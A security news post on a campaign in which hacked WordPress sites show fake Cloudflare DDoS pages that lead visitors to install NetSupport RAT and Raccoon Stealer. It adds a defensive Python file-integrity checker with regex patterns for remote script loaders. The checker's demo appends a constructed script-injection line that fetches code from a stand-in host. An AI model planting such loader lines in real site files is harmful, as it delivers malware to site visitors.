Colin Mc Hugo
Security Engineer Manager & CEO at Quantum Infinite Solutions Group Ltd.

Hackers Using Fake DDoS Protection Pages to Distribute Malware

August 24, 2022

WordPress websites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer.

“A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevention prompts which lead victims to download remote access trojan malware,” Sucuri’s Ben Martin said in a write-up published last week.

Distributed denial-of-service (DDoS) protection pages are browser verification checks (interstitials) placed in front of a site to stop bot-driven, unwanted, or malicious traffic from consuming bandwidth and taking the site down. Because visitors are used to seeing them, a convincing imitation draws little suspicion.

The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file (“security_install.iso”) onto the victim’s system.

This is achieved by injecting three lines of code into a JavaScript file (“jquery.min.js”), or alternatively into the active theme file of the site, which in turn loads heavily obfuscated JavaScript from a remote server. Note that jquery.min.js is the name of the jQuery bundle WordPress itself ships, so the tampered file does not stand out by name or location; only comparing it against a known-good hash or the pristine copy from the WordPress release reveals the appended lines.

“This JavaScript then communicates with a second malicious domain which loads more JavaScript that initiates the download prompt for the malicious .iso file,” Martin explained.

After the download, users are prompted to enter a verification code generated by the so-called “DDoS Guard” application, to entice the victim into opening the weaponized installer file and reaching the destination website.

While the installer does display a verification code to maintain the ruse, the file is in reality a remote access trojan called NetSupport RAT, which is linked to the FakeUpdates (aka SocGholish) malware family, and it also covertly installs Raccoon Stealer, a credential-stealing trojan available for rent on underground forums. A genuine Cloudflare or other CDN challenge completes entirely inside the browser and never asks the visitor to download or run a file, so any “verification” that requires opening an ISO or an installer is the lure itself.

The development is a sign that attackers are opportunistically co-opting these familiar security mechanisms in their own campaigns in a bid to trick unsuspecting website visitors into installing malware.

To mitigate such threats, website owners are advised to place their sites behind a web application firewall, use file integrity checks so that unexpected changes to core, plugin, and theme files are detected, and enforce two-factor authentication (2FA) on administrative accounts. Website visitors are also urged to turn on 2FA, avoid opening suspicious files, and use a script blocker in the browser to prevent the execution of untrusted JavaScript.
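As an added example (not code from this post or from Sucuri’s write-up), here is a minimal file-integrity check in Python that serves both the injection described above (a few lines appended to jquery.min.js or a theme file that pull in a remote script) and the “file integrity checks” recommended here. It assumes a standard WordPress directory layout and a baseline of SHA-256 hashes taken while the site was known-clean; the loader regexes and the snippet appended in demo() are constructed for illustration and are not the campaign’s real indicators or code.

```python
"""Added example, not code from the Sucuri write-up or from this post: a small
file-integrity check for a WordPress tree, of the kind the mitigation advice
refers to, aimed at the change described in the post (a few lines appended to
jquery.min.js or a theme file that load a remote script).

Assumptions, mine rather than the page's: a standard WordPress layout, a
baseline of SHA-256 hashes taken while the site was known-clean, and a set of
generic "remote script loader" regexes used only to triage changed files. The
appended snippet in demo() is constructed; the page does not reproduce the
real injected code.
"""
import hashlib
import json
import re
import tempfile
from pathlib import Path

WATCHED_SUFFIXES = {".js", ".php"}

# Generic indicators that a file now loads or unpacks script from elsewhere.
# Constructed triage hints, not a signature for this campaign.
LOADER_PATTERNS = [
    re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),
    re.compile(r"\.src\s*=\s*['\"]https?://", re.I),
    re.compile(r"<script[^>]+src\s*=\s*['\"]https?://", re.I),
    re.compile(r"eval\(\s*(?:atob|unescape|String\.fromCharCode)\(", re.I),
]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each .js/.php file under root (path relative to root) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix in WATCHED_SUFFIXES
    }


def loader_indicators(path: Path) -> list:
    """Patterns from LOADER_PATTERNS that match the file's contents (empty if none)."""
    text = path.read_text(errors="replace")
    return [pat.pattern for pat in LOADER_PATTERNS if pat.search(text)]


def check_integrity(root: Path, baseline: dict) -> dict:
    """Compare the tree against the baseline; triage changed/new files for loaders."""
    current = build_baseline(root)
    modified = sorted(k for k in current if k in baseline and current[k] != baseline[k])
    added = sorted(k for k in current if k not in baseline)
    missing = sorted(k for k in baseline if k not in current)
    suspicious = {}
    for rel in modified + added:
        hits = loader_indicators(root / rel)
        if hits:
            suspicious[rel] = hits
    return {"modified": modified, "added": added, "missing": missing,
            "suspicious": suspicious}


def demo() -> dict:
    """Constructed scenario: clean baseline, then a loader appended to jquery.min.js."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        jq = root / "wp-includes" / "js" / "jquery" / "jquery.min.js"
        jq.parent.mkdir(parents=True)
        jq.write_text("/*! jQuery v3.6.0 | stand-in for the real bundle */\n")
        fn = root / "wp-content" / "themes" / "demo-theme" / "functions.php"
        fn.parent.mkdir(parents=True)
        fn.write_text("<?php // constructed theme file\n")

        # Take the baseline on the known-clean tree and store it off-box as JSON.
        baseline_json = json.dumps(build_baseline(root))

        # Simulate the compromise: a few lines appended that fetch a remote script.
        # Constructed, not the campaign's real code.
        with jq.open("a") as f:
            f.write("var s=document.createElement('script');"
                    "s.src='https://example.invalid/loader.js';"
                    "document.head.appendChild(s);\n")

        return check_integrity(root, json.loads(baseline_json))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Take the baseline immediately after deploying from a verified WordPress package, store the JSON somewhere the web server cannot write to, and run check_integrity on a schedule. Anything listed under “suspicious” for a core file such as jquery.min.js should be diffed against the pristine copy from the WordPress release rather than simply re-hashed, since re-baselining a tampered file would make the injection permanent.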

“The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious ‘slave’ network, extort the computer owner, and violate their privacy, all depending on what the attackers decide to do with the compromised device,” Martin said.

This isn’t the first time ISO-themed files and CAPTCHA checks have been used to deliver NetSupport RAT.

In April 2022, eSentire disclosed an attack chain that used a fake Chrome installer to deploy the trojan, which then paved the way for the execution of Mars Stealer. Additionally, an IRS-themed phishing campaign detailed by Cofense and Walmart Global Tech used fake CAPTCHA puzzles on websites to deliver the same malware.
